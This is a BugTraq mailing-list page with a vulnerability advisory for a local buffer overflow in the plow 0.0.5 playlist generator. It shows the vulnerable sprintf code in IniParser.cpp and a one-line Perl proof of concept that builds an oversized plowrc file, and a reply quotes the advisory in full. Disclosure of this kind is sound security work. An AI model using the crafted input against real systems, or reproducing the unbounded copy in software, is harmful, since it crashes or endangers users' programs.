BugTraq
Back to list
|
Post reply
plow 0.0.5 <= Buffer Overflow Vulnerability
Jul 03 2012 12:11PM
pereira secbiz de
(1 replies)
#################################################
plow 0.0.5 <= Buffer Overflow Vulnerability
#################################################
Discovered by: Jean Pascal Pereira <pereira (at) secbiz (dot) de [email concealed]>
Vendor information:
"plow is a command line playlist generator."
Vendor URI: http://developer.berlios.de/projects/plow/
#################################################
Risk-level: Medium
The application is prone to a local buffer overflow vulnerability.
-------------------------------------
IniParser.cpp, line 26:
26: char buffer[length];
27: char group [length];
28:
29: char *option;
30: char *value;
31:
32: while(ini.getline(buffer, length)) {
33: if(!strlen(buffer) || buffer[0] == '#') {
34: continue;
35: }
36: if(buffer[0] == '[') {
37: if(buffer[strlen(buffer) - 1] == ']') {
38: sprintf(group, "%s", buffer);
39: } else {
40: err = 1;
41: break;
42: }
43: }
-------------------------------------
Exploit / Proof Of Concept:
Create a crafted plowrc file:
perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc
-------------------------------------
Solution:
Do some input validation.
-------------------------------------
#################################################
[ reply ]
Re: plow 0.0.5 <= Buffer Overflow Vulnerability
Jul 08 2012 07:49AM
Henri Salo (henri nerv fi)
Privacy Statement
Copyright 2010, SecurityFocus
plow 0.0.5 <= Buffer Overflow Vulnerability
#################################################
Discovered by: Jean Pascal Pereira <pereira (at) secbiz (dot) de [email concealed]>
Vendor information:
"plow is a command line playlist generator."
Vendor URI: http://developer.berlios.de/projects/plow/
#################################################
Risk-level: Medium
The application is prone to a local buffer overflow vulnerability.
-------------------------------------
IniParser.cpp, line 26:
26: char buffer[length];
27: char group [length];
28:
29: char *option;
30: char *value;
31:
32: while(ini.getline(buffer, length)) {
33: if(!strlen(buffer) || buffer[0] == '#') {
34: continue;
35: }
36: if(buffer[0] == '[') {
37: if(buffer[strlen(buffer) - 1] == ']') {
38: sprintf(group, "%s", buffer);
39: } else {
40: err = 1;
41: break;
42: }
43: }
-------------------------------------
Exploit / Proof Of Concept:
Create a crafted plowrc file:
perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc
-------------------------------------
Solution:
Do some input validation.
-------------------------------------
#################################################
[ reply ]